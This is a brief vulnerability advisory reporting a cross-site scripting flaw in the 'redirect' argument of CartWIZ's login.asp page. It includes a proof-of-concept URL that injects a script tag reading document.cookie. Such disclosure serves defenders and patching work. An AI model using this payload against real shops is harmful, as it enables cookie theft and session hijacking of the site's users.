CartWIZ Login.ASP Redirect Argument Cross-Site Scripting Vulnerability

CartWIZ Login.ASP Redirect Argument Cross-Site Scripting Vulnerability

No exploit is required.

The following proof of concept URI is available:
http://www.example.com/store/login.asp?message=Please+login+using+the+form+above+to+access+your+account.&redirect='"><script>alert(document.cookie)</script>